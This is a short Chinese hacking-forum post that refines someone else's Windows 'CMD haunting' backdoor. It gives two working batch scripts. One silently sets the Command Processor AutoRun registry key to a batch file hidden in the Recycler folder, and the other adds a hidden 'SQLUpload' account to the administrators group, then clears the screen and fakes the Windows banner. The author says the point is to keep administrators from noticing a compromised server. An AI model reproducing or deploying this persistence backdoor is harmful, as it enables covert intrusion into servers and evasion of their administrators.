小心,CMD也闹鬼 (续)
独存,0kee.com
初中毕业水平,语言表达能力不是很强,见谅哈。
看了冰的原点的帖子:http://www.2cto.com/os/200710/19395.html
感觉有许多不足。
NTFS分区的回收站是:Recycler而不是Recycled
我为什么说NTFS分区呢?因为大部分服务器为了安全,都把分区给转换为了NTFS分区(我见过N多服务器,暂时没见过别的分区格式的)
而冰的原点批处理是以FAT32类型的回收站,也就是:Recycled
并且执行cmd命令后,会有命令执行完成的提示,稍微有点常识的管理员就会认识到服务器被提权鸟。
这个问题也纠缠了我半天,后来想到了清屏命令,所以就改了下批处理。
ECHO Windows Registry Editor Version 5.00>door.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand Processor]>>door.reg
ECHO "autorun"="c:\Recycler\1.bat">>door.reg
REGEDIT /S door.reg
DEL /F /Q door.reg
copy 1.bat c:\Recycler\1.bat /Y
用记事本保存为:注册系统环境.bat
@ECHO OFF
net user SQLUpload ducun /add
cls
net localgroup administrators SQLUpload /add
cls
@ECHO Microsoft Windows 2003 [版本 5.1.2600]
@ECHO (C) 版权所有 1985-2001 Microsoft Corp.
用记事本保存为:1.bat
注意:1.bat要和注册系统环境.bat放在同一目录,这样每次运行cmd就不会提示命令执行完成了,唯一的缺点就是清屏时会有闪烁。
相关新闻>>
- 发表评论
-
- 最新评论 更多>>
